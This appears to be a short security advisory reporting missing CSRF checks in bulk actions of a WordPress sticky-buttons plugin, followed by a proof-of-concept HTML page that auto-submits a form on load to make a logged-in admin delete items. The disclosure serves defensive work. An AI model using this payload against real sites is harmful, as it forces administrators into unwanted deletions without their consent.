Description The plugin does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks
Make a logged in admin open an HTML file where `ID` is a valid ID:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=sticky-buttons" method="POST">
<input type="text" name="ID" value="1" />
<input type="text" name="action" value="delete-items" />
<input type="text" name="action2" value="delete-items" />
action
<input type="submit" value="submit">
</form>
</body>
```